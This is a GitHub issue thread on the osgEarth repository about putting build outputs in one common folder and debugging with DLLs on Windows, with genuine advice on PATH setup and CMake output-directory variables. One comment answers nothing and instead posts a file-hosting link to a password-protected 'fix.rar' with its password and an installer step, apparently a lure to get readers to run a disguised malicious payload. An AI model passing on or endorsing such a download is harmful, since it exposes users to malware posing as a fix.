### ISSUE TITLE
Common folder for all build artifacts?

### ISSUE THREAD

**Issue by remoe** [gwaldron/osgearth#2615]
In the current master branch, all build artifacts are generated in multiple different folders. What is your workflow for debugging osgEarth on Windows using DLLs? What environment variables do you use?

With a single common binary build folder, you can set it up so that all binaries are easily discoverable.

**Comment by remoe** [comment]
Yes, I know, but I mean debugging osgEarth by self without any other project. Only stock samples.

**Comment by FabrizioValenti** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by jasonbeverage** [comment]
Locally I always run the INSTALL step in Visual Studio when I build and then make sure that the bin directory of whatever I set my CMAKE_INSTALL_PREFIX to is included in my PATH env var.  So if I install to c:/Installs/osgEarth I make sure c:/Installs/osgEarth/bin is in the PATH.  If I want to debug I make sure I open Visual Studio with that PATH set.  If you add your install path via the control panel in Windows then it should just work, but I usually set it in in a command line environment and then just open visual studio from that environment by going to where my OSGEarth.sln file is and typing "OSGEarth.sln" and hitting enter in the command line.

Hope that helps!

**Comment by remoe** [comment]
Ok, thanks. To avoid the need to build the INSTALL step, one can use one or more of the following options:

```cmake
CMAKE_RUNTIME_OUTPUT_DIRECTORY
CMAKE_ARCHIVE_OUTPUT_DIRECTORY
CMAKE_LIBRARY_OUTPUT_DIRECTORY
```
Then all binaries are on one location.
